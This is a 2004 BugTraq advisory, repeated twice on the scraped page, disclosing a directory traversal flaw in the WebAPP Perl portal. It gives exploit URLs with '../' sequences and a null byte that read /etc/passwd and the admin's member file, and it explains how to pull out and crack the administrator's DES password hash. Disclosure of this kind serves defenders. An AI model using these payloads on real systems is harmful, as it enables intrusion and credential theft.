BugTraq
Back to list
|
Post reply
WebAPP directory traversal and ability to retrieve the DES encrypted password hash
Aug 24 2004 03:42PM
Jérôme ATHIAS (jerome athias caramail com)
WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :
-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source
Several user mods are also available which ranges from chat
to e-commerce applications.
Several vulnerabilities in these mods have already been
discovered.
The WebAPP system itself has a serious reverse directory
traversal vulnerability.
Example..
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/
2) Click on Articles on the main menu at the left side of
the screen
3) Click on any of the icons representing the misc topics
available /i chose the "bugs" section/
4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bu
gs"
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=..
/../../../../../../etc/passwd%00"
5)View the html source for the page
A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=..
/../db/members/admin.dat%00"
View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>
"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it
Every user would have a corresponding .dat file within the
db/members directory
PhTeam Release
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :
-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source
Several user mods are also available which ranges from chat
to e-commerce applications.
Several vulnerabilities in these mods have already been
discovered.
The WebAPP system itself has a serious reverse directory
traversal vulnerability.
Example..
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/
2) Click on Articles on the main menu at the left side of
the screen
3) Click on any of the icons representing the misc topics
available /i chose the "bugs" section/
4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bu
gs"
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=..
/../../../../../../etc/passwd%00"
5)View the html source for the page
A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=..
/../db/members/admin.dat%00"
View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>
"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it
Every user would have a corresponding .dat file within the
db/members directory
PhTeam Release
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball
[ reply ]